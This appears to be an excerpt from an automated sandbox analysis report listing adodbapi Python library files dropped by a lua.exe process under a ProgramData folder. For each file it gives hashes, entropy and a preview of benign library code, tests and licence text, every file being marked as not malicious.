Preview:	# ADO enumerated constants documented on MSDN:.# http://msdn.microsoft.com/en-us/library/ms678353(VS.85).aspx..# IsolationLevelEnum.adXactUnspecified = -1.adXactBrowse = 0x100.adXactChaos = 0x10.adXactCursorStability = 0x1000.adXactIsolated = 0x100000.adXactReadCommitted = 0x1000.adXactReadUncommitted = 0x100.adXactRepeatableRead = 0x10000.adXactSerializable = 0x100000..# CursorLocationEnum.adUseClient = 3.adUseServer = 2..# CursorTypeEnum.adOpenDynamic = 2.adOpenForwardOnly = 0.adOpenKeyset = 1.adOpenStatic = 3.adOpenUnspecified = -1..# CommandTypeEnum.adCmdText = 1.adCmdStoredProc = 4.adSchemaTables = 20..# ParameterDirectionEnum.adParamInput = 1.adParamInputOutput = 3.adParamOutput = 2.adParamReturnValue = 4.adParamUnknown = 0.directions = {. 0: 'Unknown',. 1: 'Input',. 2: 'Output',. 3: 'InputOutput',. 4: 'Return',. }.def ado_direction_name(ado_dir):. try:. retu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\adodbapi.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	46685
Entropy (8bit):	4.419352479786135
Encrypted:	false
SSDEEP:	768:+uQoM2MTj9ZwnKSt0d2vIZQdnwvu1/rqqoEpArtgcyWxrRT5kKY0q:+4M2uj9ZwnKSt0d2AqwvuhH9pArJlrR8
MD5:	A317F57F74000448FC234F02896EA7AD
SHA1:	E66CEF5A6C97CAF3DC7A6207685476F3606D75E4
SHA-256:	3943D0F55BE9ABB301F686C15B15117C34769F9B9E78420E4127D1AF72196E14
SHA-512:	BA5B85F59B4A2B6E5C6040B0CB605A31DABCACF5D3AD2F04472F1C6E0A9F6A5992B1863CD4EB6172FDF99267E3D515B800083B0DD36FBDCF7DDE548DA8ED9ABF
Malicious:	false
Preview:	"""adodbapi - A python DB API 2.0 (PEP 249) interface to Microsoft ADO..Copyright (C) 2002 Henrik Ekelund, versions 2.1 and later by Vernon Cole.* http://sourceforge.net/projects/pywin32.* https://github.com/mhammond/pywin32.* http://sourceforge.net/projects/adodbapi.. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 0211

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\apibase.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	28881
Entropy (8bit):	4.730277036239611
Encrypted:	false
SSDEEP:	384:FMAe5m0i6e5k79qfgpdRTUxG0rt7t4OZ8+ZtQDjZ6wnJkbUU/ziIsu:FM35mOe5k7lvUo0rtZdZ8cgjZ6qJsrf
MD5:	97ACA6B9A28FFA7AE2B3CCBF4DD828DE
SHA1:	4E57BA7A7D292C31BD78CD28BE64A4FEDB2B9305
SHA-256:	B73BA9EEC87E69E56A4E8D27F2961AF34B5298655EA64013CFCA38700053D34B
SHA-512:	44D972303AE0114694962DDC34FFC7629BD18D0EF8BF8FF85DD71E8E7A1E74C56E39461B9CF5437DA0ADD0077A8BCA46795772CAB2455239FF2D7B467A52C0EE
Malicious:	false
Preview:	"""adodbapi.apibase - A python DB API 2.0 (PEP 249) interface to Microsoft ADO....Copyright (C) 2002 Henrik Ekelund, version 2.1 by Vernon Cole..* http://sourceforge.net/projects/pywin32..* http://sourceforge.net/projects/adodbapi.."""....import sys..import time..import datetime..import decimal..import numbers..# noinspection PyUnresolvedReferences..from . import ado_consts as adc....verbose = False # debugging flag....onIronPython = sys.platform == 'cli'..if onIronPython: # we need type definitions for odd data we may need to convert.. # noinspection PyUnresolvedReferences.. from System import DBNull, DateTime.. NullTypes = (type(None), DBNull)..else:.. DateTime = type(NotImplemented) # should never be seen on win32.. NullTypes = type(None)....# --- define objects to smooth out Python3 <-> Python 2.x differences..unicodeType = str..longType = int..StringTypes = str..makeByteBuffer = bytes..memoryViewType = memoryview.._BaseException = Exception....try:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\examples\db_print.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2236
Entropy (8bit):	4.833903677213369
Encrypted:	false
SSDEEP:	24:HR7CVAw3OckCk/URiI9bhB2wt5ppK44ZSHt4YyLlOBvZ+VCwKLE19prDwK+GK39i:xm18ERi+PpK44ZSN4ZLm+4GbwVt3yg6h
MD5:	96D9F5F4ECD8049CE3D960FB057B2F17
SHA1:	B0589009D0D3BE258D3BE0273FE6F4206B07E1E4
SHA-256:	2611B52E7AC518E5834E9328A89D2EAE90E407F2506349E45B85FC94B981E496
SHA-512:	E719AEE26BAACAA362E26E3FE9862B667A31AB6B1B0E34DC310E52BE8A7138E5FAFCD2BF6C1456CC69BF15BE401D39878FEEB8A9E59C636F3897FFB005CB30B3
Malicious:	false
Preview:	""" db_print.py -- a simple demo for ADO database reads."""....import sys..import adodbapi.ado_consts as adc....cmd_args = ('filename', 'table_name')..if 'help' in sys.argv:.. print('possible settings keywords are:',cmd_args).. sys.exit()....kw_args = {} # pick up filename and proxy address from command line (optionally)..for arg in sys.argv:.. s = arg.split("=").. if len(s) > 1:.. if s[0] in cmd_args:.. kw_args[s[0]] = s[1]....kw_args.setdefault('filename', "test.mdb") # assumes server is running from examples folder..kw_args.setdefault('table_name', 'Products') # the name of the demo table....# the server needs to select the provider based on his Python installation..provider_switch = ['provider', 'Microsoft.ACE.OLEDB.12.0', "Microsoft.Jet.OLEDB.4.0"]....# ------------------------ START HERE -------------------------------------..#create the connection..constr = "Provider=%(provider)s;Data Source=%(filename)s"..import adodbapi as db..con = db.connect(

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\examples\db_table_names.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	522
Entropy (8bit):	4.995125505838
Encrypted:	false
SSDEEP:	12:i+F7Q6K53hYxWvpB3h0clyeH59/M5EYc0rqt/hPWboc37fmm:nF7cPYCbRH59oEYcf/Otqm
MD5:	3FFD290D5415D1E2843A2ADDC9A4CB6E
SHA1:	B2EAC5CD09DD1EC02C2F44EFC00B7EC7B143B68A
SHA-256:	0E79174FDF00132979A19F4CC33489669A346B1E197F35F1CDA176FB308D627C
SHA-512:	F27222481063F9D996925EADDAA47BC5C39B390BBF57021B548518542823218AF412CC5A3ED2E4FC0537E24302260C8F3EF5654A6F48C6A7699F9206BC56B2DB
Malicious:	false
Preview:	""" db_table_names.py -- a simple demo for ADO database table listing."""..import sys..import adodbapi....try:.. databasename = sys.argv[1]..except IndexError:.. databasename = "test.mdb"....provider = ['prv', "Microsoft.ACE.OLEDB.12.0", "Microsoft.Jet.OLEDB.4.0"]..constr = "Provider=%(prv)s;Data Source=%(db)s"....#create the connection..con = adodbapi.connect(constr, db=databasename, macro_is64bit=provider)....print('Table names in= %s' % databasename)....for table in con.get_table_names():.. print(table)..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\examples\xls_read.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1126
Entropy (8bit):	5.052939482404708
Encrypted:	false
SSDEEP:	24:kxq9iLbhyvg/PaYKabL15z6MbeeGM4zrYErgyXV:kZ3wvgHFK4LP/beePYgyXV
MD5:	CCACBB18A5F1456C342A6FFCB51ABEDF
SHA1:	EFBD11A376B20F27B2BF4536A4F3CD3D88654C14
SHA-256:	7FFC036470F63D94A9F1148328688FFF50DD1409CA4320B4CC673FF1EBEA4118
SHA-512:	46A601881BA065CB6E88D9A20FA05A9F789442EB2FEA15B9ACDB4510965B2CF43CAA1ACEA412D6DE0A0C83EF98ED63CF03620A302CF0C90BB8FC6A7A2D91FC8D
Malicious:	false
Preview:	import sys..import adodbapi..try:.. import adodbapi.is64bit as is64bit.. is64 = is64bit.Python()..except ImportError:.. is64 = False....if is64:.. driver = "Microsoft.ACE.OLEDB.12.0"..else:.. driver = "Microsoft.Jet.OLEDB.4.0"..extended = 'Extended Properties="Excel 8.0;HDR=Yes;IMEX=1;"'....try: # first command line argument will be xls file name -- default to the one written by xls_write.py.. filename = sys.argv[1]..except IndexError:.. filename = 'xx.xls'....constr = "Provider=%s;Data Source=%s;%s" % (driver, filename, extended)....conn = adodbapi.connect(constr)....try: # second command line argument will be worksheet name -- default to first worksheet.. sheet = sys.argv[2]..except IndexError:.. # use ADO feature to get the name of the first worksheet.. sheet = conn.get_table_names()[0]....print('Shreadsheet=%s Worksheet=%s' % (filename, sheet))..print('------------------------------------------------------------')..crsr = conn.cursor()..sql = "SELE

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\examples\xls_write.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.964934119546142
Encrypted:	false
SSDEEP:	24:PIqqWSLbXimscDL15z2oWPkVYb0A65zx1114D1nCLirqLIo:PnS36cDLOvb0vD114JnCNLR
MD5:	8FBD18E3C821F43D68E55318B13CF693
SHA1:	26CB5FAED45DDB1CA6BE939CD2CA68B4AA2342FD
SHA-256:	6DC07615653BAB9E148DCA63291127E0DDA41BEF8F267582DE9BC1361E74BA42
SHA-512:	A12EAE3C9D5C0D17F3DEBB6FF40F885A1D58064A460E021803D49FE8E09D1F929B13F5B0DA6AB95CB5AE0FDCFDF145DAAA387557A61A7B37B35267F818B841D1
Malicious:	false
Preview:	import adodbapi..import datetime..try:.. import adodbapi.is64bit as is64bit.. is64 = is64bit.Python()..except ImportError:.. is64 = False # in case the user has an old version of adodbapi..if is64:.. driver = "Microsoft.ACE.OLEDB.12.0"..else:.. driver = "Microsoft.Jet.OLEDB.4.0"..filename = 'xx.xls' # file will be created if it does not exist..extended = 'Extended Properties="Excel 8.0;Readonly=False;"'....constr = "Provider=%s;Data Source=%s;%s" % (driver, filename, extended)....conn = adodbapi.connect(constr)..with conn: # will auto commit if no errors.. with conn.cursor() as crsr:.. try: crsr.execute('drop table SheetOne').. except: pass # just is case there is one already there.... # create the sheet and the header row and set the types for the columns.. crsr.execute('create table SheetOne (Name varchar, Rank varchar, SrvcNum integer, Weight float, Birth date)').... sql = "INSERT INTO SheetOne (name, rank , srvcnum, weight

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\is64bit.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1203
Entropy (8bit):	4.726247984834011
Encrypted:	false
SSDEEP:	24:tHUmPtH+vt/1T77ChCWiEkH//BQ7/hMiWnKF7BSfSQbIgvgGgQtICdeeppJRNE:tHXVHwtNTeC5bH//S7Cnk7BSfSQc1GgL
MD5:	436161183FF19C85F1B52A716D466FF6
SHA1:	233595387599435B72F82C3C87CFC733AB5633DE
SHA-256:	841024566C44BFE1C81350186F2968C6F06FA927AAAA45B6243A7AD8CBED632D
SHA-512:	A33036574205F9772D7E4F660E132925470DAEC2D634F8370D054133EF985FC93B502C586AF073F2251BE9BF5930174F8CCDD0A04B6FC34D9FD471B6650F4E59
Malicious:	false
Preview:	"""is64bit.Python() --> boolean value of detected Python word size. is64bit.os() --> os build version"""..import sys....def Python():.. if sys.platform == 'cli': #IronPython.. import System.. return System.IntPtr.Size == 8.. else:.. try:.. return sys.maxsize > 2147483647.. except AttributeError:.. return sys.maxint > 2147483647....def os():.. import platform.. pm = platform.machine().. if pm != '..' and pm.endswith('64'): # recent Python (not Iron).. return True.. else:.. import os.. if 'PROCESSOR_ARCHITEW6432' in os.environ:.. return True # 32 bit program running on 64 bit Windows.. try:.. return os.environ['PROCESSOR_ARCHITECTURE'].endswith('64') # 64 bit Windows 64 bit program.. except (IndexError, KeyError):.. pass # not Windows.. try:.. return '64' in platform.architecture()[0] # this often works in Linux.. except:..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\license.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26423
Entropy (8bit):	4.611827311945595
Encrypted:	false
SSDEEP:	384:Xv56OuAbnL0UP+X6wFDVxnF+7xqsvLt+z/k8E9HinIVFkspWM9bc7opt0SZuQi:Xv5trJ+DnFCL1leSWmc7ktvZuQi
MD5:	652B4E2F7A8A93E7ABDD2DE7031E0BDB
SHA1:	C627EBED0FC837F3F926B18F9A1712028D60F233
SHA-256:	610E0C3A24A26ACB0470F8F5EB0298DF966FC380CEE8E0FEBDAC6791B6209D6C
SHA-512:	7979E76E3706D83D8F59FF2F16F10373B7A14718E41CDBE2DA8EA3BB9AAD797DBDAAEDA44253F0ECABBC6A327A53138DF257BE4EB7CACCA6041F23A05C94A18D
Malicious:	false
Preview:	.. GNU LESSER GENERAL PUBLIC LICENSE... Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.]..... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use it. You.can use it too, but we su

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\process_connect_string.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5494
Entropy (8bit):	4.4267978499209955
Encrypted:	false
SSDEEP:	96:5VhqUYGp3lPG5pPHwyfXu1X1+8HoJsK/ItGoGT+GTGNdMGtgN4JFH3i:kl0lPG5FQ/vNd/5H3i
MD5:	C6C854430269FFC0DFA7AD4510CAD7DF
SHA1:	65E446AC20FB633E93C29BADD1D6C154F940EE98
SHA-256:	5189EB3F731CA7C4E88E5BCCC3FEC77BE4E8BDD022D7ACE2CB1761C2497A6419
SHA-512:	33C38DC49536289EC08121F5506E252576E4ABA17553615A3B20359EEF62B3795067F7856D0F71BEB276FD5C6ECC06BF8F0B4973E43622D3904405121FC739B3
Malicious:	false
Preview:	""" a clumsy attempt at a macro language to let the programmer execute code on the server (ex: determine 64bit)"""..from . import is64bit as is64bit....def macro_call(macro_name, args, kwargs):.. """ allow the programmer to perform limited processing on the server by passing macro names and args.... :new_key - the key name the macro will create.. :args[0] - macro name.. :args[1:] - any arguments.. :code - the value of the keyword item.. :kwargs - the connection keyword dictionary. ??key has been removed.. --> the value to put in for kwargs['name'] = value.. """.. if isinstance(args, (str, str)):.. args = [args] # the user forgot to pass a sequence, so make a string into args[0].. new_key = args[0].. try:.. if macro_name == "is64bit":.. if is64bit.Python(): # if on 64 bit Python.. return new_key, args[1] # return first argument.. else:.. try:.. return new_key, args[

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\readme.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5077
Entropy (8bit):	4.884297848702526
Encrypted:	false
SSDEEP:	96:/yxrPLNlZYTR9xq6YnSzzQuOldblTEN8tvEqGcVEf7NjVDlUzYfi2T:/8/TXdbdvDGcVEf7NjH3L
MD5:	57C9E012D4EDD985537CFDAB7A480C8F
SHA1:	E79E4B89D08954B8A9949148F6E6C8E14E2813D1
SHA-256:	2E4EE2F591480A5ED3E2750BB04CCA0621F0F1B195C9A2F320C14ED0541DDBDD
SHA-512:	1356923628D57703C1FE0D6634888F2C92F7DB1A2C123D6A6C51FED212A9C9473DDC2DB1D4D9FF3A86AF9FDD328DAF2BD54F2ECB050CAE93E114703FE1D24EBD
Malicious:	false
Preview:	Project..-------..adodbapi....A Python DB-API 2.0 (PEP-249) module that makes it easy to use Microsoft ADO ..for connecting with databases and other data sources..using either CPython or IronPython.....Home page: <http://sourceforge.net/projects/adodbapi>....Features:..* 100% DB-API 2.0 (PEP-249) compliant (including most extensions and recommendations)...* Includes pyunit testcases that describe how to use the module. ..* Fully implemented in Python. -- runs in Python 2.5+ Python 3.0+ and IronPython 2.6+..* Licensed under the LGPL license, which means that it can be used freely even in commercial programs subject to certain restrictions. ..* The user can choose between paramstyles: 'qmark' 'named' 'format' 'pyformat' 'dynamic'..* Supports data retrieval by column name e.g.:.. for row in myCurser.execute("select name,age from students"):.. print("Student", row.name, "is", row.age, "years old.")..* Supports user-definable system-to-Python data conversion functions (selected by ADO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\remote.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19896
Entropy (8bit):	4.5493669740790645
Encrypted:	false
SSDEEP:	384:n2huQztB2mvjX9b1aa+cvDJFkHZCzSjdDd:n2huQztRvjtDJFAjjdDd
MD5:	4C2DFECD18E2C550EA1EC106FA0C4FA8
SHA1:	79A0077BDB9FAB77C0A43DFCDCF18A9704DFF3D6
SHA-256:	3EDBA6B4D126E70BCC71FFC8B23C92E9EA17431F3B4AB971C375715960E97A7B
SHA-512:	4DCCE965056D309631A515674A8F892094317BC97E2DB359B4E6A8BB763BE0C10C950E9667130A02DD8AFB89B9E7617A7071975CEDB973EB67394F14B5D41761
Malicious:	false
Preview:	"""adodbapi.remote - A python DB API 2.0 (PEP 249) interface to Microsoft ADO..Copyright (C) 2002 Henrik Ekelund, version 2.1 by Vernon Cole.* http://sourceforge.net/projects/pywin32.* http://sourceforge.net/projects/adodbapi.. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.. django adaptations and re

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\schema_table.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	432
Entropy (8bit):	4.741784618097318
Encrypted:	false
SSDEEP:	12:JFS/gWWyeWNG+hbeashXFmitoXfy5LwAqgz9/wdOic//yOv:6/lsaGX0Xa5chgx/i0/6Ov
MD5:	3C93C5C95FC6FC9F454B67373B8BD999
SHA1:	E6284ECF53423908962409E251AEE3BA2B52C378
SHA-256:	761EE5B3C5388F7F27349172802207134E1BFCEBDE27581601373B0B3CAB1D89
SHA-512:	F9DF3B43C42DAB4198B9F5B62996204A184544F206023B264AAB61DE869590FD8D7512CA2FA38BD0D43A298B02EEAEBC7A8F06EA3753A8790C7D16A4AD6E58EA
Malicious:	false
Preview:	"""call using an open ADO connection --> list of table names"""..from . import adodbapi....def names(connection_object):.. ado = connection_object.adoConn.. schema = ado.OpenSchema(20) # constant = adSchemaTables.... tables = [].. while not schema.EOF:.. name = adodbapi.getIndexedValue(schema.Fields,'TABLE_NAME').Value.. tables.append(name).. schema.MoveNext().. del schema.. return tables..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\setup.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2982
Entropy (8bit):	5.067318969263889
Encrypted:	false
SSDEEP:	48:izCNqI/qI9QIRj6gILyk13LeL7RaDawkEdOxvShKNh5ptA/rMnpINX9cGAjvAT/W:izCNr/r9QIRGgILyk13Q7RaD7kMOxqhC
MD5:	2D5C711FB46932E36F01607314DE1CB6
SHA1:	C5C525BCC334126A1B670D82C4C58DFFDCECDCCC
SHA-256:	B7ACAA62713A249A724D6C87C9A0D6FB8906721DAB36D48228B0B2F2E4C99D08
SHA-512:	AA310E07664D7F94F429DF8C87EEF6BA7EF1DCDB83CC080092A31D5267261108A3ADBA9D924A69225C91A35A4BAB34187E5493AD154CE506AA793AA604BF305A
Malicious:	false
Preview:	"""adodbapi -- a pure Python PEP 249 DB-API package using Microsoft ADO..Adodbapi can be run on CPython version 2.7,.or IronPython version 2.6 and later,.or Python 3.5 and later (after filtering through 2to3.py).""".CLASSIFIERS = """\.Development Status :: 5 - Production/Stable.Intended Audience :: Developers.License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL).Operating System :: Microsoft :: Windows.Operating System :: POSIX :: Linux.Programming Language :: Python.Programming Language :: Python :: 3.Programming Language :: SQL.Topic :: Software Development.Topic :: Software Development :: Libraries :: Python Modules.Topic :: Database."""..NAME = 'adodbapi'.MAINTAINER = "Vernon Cole".MAINTAINER_EMAIL = "vernondcole@gmail.com".DESCRIPTION = """A pure Python package implementing PEP 249 DB-API using Microsoft ADO.""".URL = "http://sourceforge.net/projects/adodbapi".LICENSE = 'LGPL'.CLASSIFIERS

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\adodbapitest.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	55811
Entropy (8bit):	4.711258975787992
Encrypted:	false
SSDEEP:	384:MkuQJ4q695SdNPJoI/qR6PeeXWhaWNh3JjPdax26wPUUs2P0mi2Oa7Bb9HeIb2QC:MkuQJ4yDPWI/qR6GGkaahFdEjwX0cZC
MD5:	1C9EAFC2BE3C1CF14114143357F59E65
SHA1:	B792010293C5BA59D5BE69CB1C2E8DA294E6E684
SHA-256:	41D13007BD78790315328F0694070FD21B9A3D3486DDC23632A561DF1F87B3FC
SHA-512:	CEA60664FC0130089B8AE40F9DD2AA979F6DD7EB3ABDDBBEE13EDFF2F9C71407F1BF7896A4D5FD50F5ED0F0104FB083B4D3FB35598178931FC6370E118A8D1E7
Malicious:	false
Preview:	""" Unit tests version 2.6.1.0 for adodbapi""".""". adodbapi - A python DB API 2.0 interface to Microsoft ADO.. Copyright (C) 2002 Henrik Ekelund.. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.. Updates by Vernon Cole."""..import unittest.import sys.import datetime.import decimal.import copy.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\adodbapitestconfig.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7361
Entropy (8bit):	4.944210579425516
Encrypted:	false
SSDEEP:	192:RIFQFzB96hWy/h5jJD7qr+VtGoCAQwDSDY4:RxsIy/XjJDkgQ/wDuY4
MD5:	3185492B05D00257F61FA02DE9CC038F
SHA1:	C27146BB719477242BF875421E76717F10B80D92
SHA-256:	A5A48C5126EE839748D124DD2F93B83C4F3E13151135F790AE0A0DA5FCBEF747
SHA-512:	08C194E913002D9B34B5206379F83C1A06B198B4B31B8CCA00DF6707BDEF7586732E80ADD77FC4E824EE82136DCDF05261DB214BD6A56C10F0C69E31DC66791B
Malicious:	false
Preview:	# Configure this to _YOUR_ environment in order to run the testcases.."testADOdbapiConfig.py v 2.6.2.B00"..# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #.# #.# # TESTERS:.# #.# # You will need to make numerous modifications to this file.# # to adapt it to your own testing environment..# #.# # Skip down to the next "# #" line --.# # -- the things you need to change are below it..# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #.import platform.import sys.import random..import is64bit.import setuptestframework.import tryconnection..print("\nPython", sys.version).node = platform.node().try: print('node=%s, is64bit.os()= %s, is64bit.Python()= %s' % (node, is64bit.os(), is64bit.Python())).except: pass..if '--help' in sys.argv:. print("""Valid command-line switches are:. --package - create a temporary test package, run 2to3 if needed.. --all - run all possible tests. --time - loop over time format tests (including mxdatetime if present). --nojet

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\dbapi20.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	34080
Entropy (8bit):	4.365679161361469
Encrypted:	false
SSDEEP:	192:W78xud+br2PCZIDiCb87y3gmXKGGU2vY9m6j3Kyj9oMDDq/NnCMujGJ606zzUj9J:W78x/A8O3gmsULAU3VjSVnPv/1us9
MD5:	54D2BEE0B96C57C30291C60607778E79
SHA1:	1A37781D94D27E89431AD7AE094D926808763B6B
SHA-256:	0B12A9425B1E7E13148C9E03F54483CA335E4F74D33E11C36AB2F5857114F2AF
SHA-512:	5E011D90EA7E0BD4114B290A6FE2D2CFAE25208F338141758309BAB023926CB03E52F7FD60193A35666C808ECC92B305296EB32A69A275D82CB36663C5EFA508
Malicious:	false
Preview:	#!/usr/bin/env python.''' Python DB API 2.0 driver compliance unit test suite. . . This software is Public Domain and may be used without restrictions... "Now we have booze and barflies entering the discussion, plus rumours of. DBAs on drugs... and I won't tell you what flashes through my mind each. time I read the subject line with 'Anal Compliance' in it. All around. this is turning out to be a thoroughly unwholesome unit test.".. -- Ian Bicking.'''..__version__ = '$Revision: 1.15.0 $'[11:-2].__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'..import unittest.import time.import sys..if sys.version[0] >= '3': #python 3.x. _BaseException = Exception. def _failUnless(self, expr, msg=None):. self.assertTrue(expr, msg).else: #python 2.x. from exceptions import Exception as _BaseException. def _failUnless(self, expr, msg=None):. self.failUnless(expr, msg) ## deprecated since Python 2.6..# set this to "True" to follow API 2.0 to

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\is64bit.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1191
Entropy (8bit):	4.715305201798576
Encrypted:	false
SSDEEP:	24:tHUmPtH+vt/1T77ChCWiEkH//BQ7/hMiWnKF7BSfSQVvgGgQtICdeeppJRNE:tHXVHwtNTeC5bH//S7Cnk7BSfSQqGgQK
MD5:	01EF40F1AC4222D2CFBC2790B32DF9F4
SHA1:	6EB2B02322A629E419BE10738EB98ACCE8A1B49D
SHA-256:	661D0E7B2787E94A1050B08A6F5462D3B5A77C8B2AD819FF8CE264965B7A1A46
SHA-512:	FDDF62982840644BD4A82516938EAB41C30DD50D5AC986DD5D5B2BCA8744B72618596DAC7EAC70F3BE23520CC02E9B1C84A2A71308384E52B1207F47661C944F
Malicious:	false
Preview:	"""is64bit.Python() --> boolean value of detected Python word size. is64bit.os() --> os build version"""..import sys....def Python():.. if sys.platform == 'cli': #IronPython.. import System.. return System.IntPtr.Size == 8.. else:.. try:.. return sys.maxsize > 2147483647.. except AttributeError:.. return sys.maxint > 2147483647....def os():.. import platform.. pm = platform.machine().. if pm != '..' and pm.endswith('64'): # recent Python (not Iron).. return True.. else:.. import os.. if 'PROCESSOR_ARCHITEW6432' in os.environ:.. return True # 32 bit program running on 64 bit Windows.. try:.. return os.environ['PROCESSOR_ARCHITECTURE'].endswith('64') # 64 bit Windows 64 bit program.. except IndexError:.. pass # not Windows.. try:.. return '64' in platform.architecture()[0] # this often works in Linux.. except:.. r

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\setuptestframework.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4159
Entropy (8bit):	4.5518780528073375
Encrypted:	false
SSDEEP:	96:Jzy2DPp54RfdnNWZ8uH8MlME8D/Ik4oKRpuOf6iSB5:J24PcRlnNWxg/98HCi6
MD5:	B808E9DA78EBE6DAE62FD1AAD6A783BD
SHA1:	1D5C2F57D4D31542BCC8E2D94893DAB2C5CD0814
SHA-256:	1C54B4696BAB8481C080EB0825DA5880B4DA209E7C77F0068FB6688279A6F19C
SHA-512:	9E2402696A0668CBF36160B14CFA5A6083286571C3BA5045F0E6B04C43611E36DCDB0BE0EA85337AD0FAE6211CED0D2C57743F9D503867228C2609F33E13A896
Malicious:	false
Preview:	#!/usr/bin/python2..# Configure this in order to run the testcases..."setuptestframework.py v 2.6.0.8"..import os..import sys..import tempfile..import shutil....try:.. OSErrors = (WindowsError, OSError)..except NameError: # not running on Windows.. OSErrors = OSError....def maketemp():.. temphome = tempfile.gettempdir().. tempdir = os.path.join(temphome, 'adodbapi_test').. try: os.mkdir(tempdir).. except: pass.. return tempdir....def _cleanup_function(testfolder, mdb_name):.. try: os.unlink(os.path.join(testfolder, mdb_name)).. except: pass # mdb database not present.. try:.. shutil.rmtree(testfolder).. print(' cleaned up folder', testfolder).. except: pass # test package not present....def getcleanupfunction():.. return _cleanup_function....def find_ado_path():.. adoName = os.path.normpath(os.getcwd() + '/../../adodbapi.py').. adoPackage = os.path.dirname(adoName).. return adoPackage....# make a new package directory for t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\test\test_adodbapi_dbapi20.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6000
Entropy (8bit):	4.636153077475715
Encrypted:	false
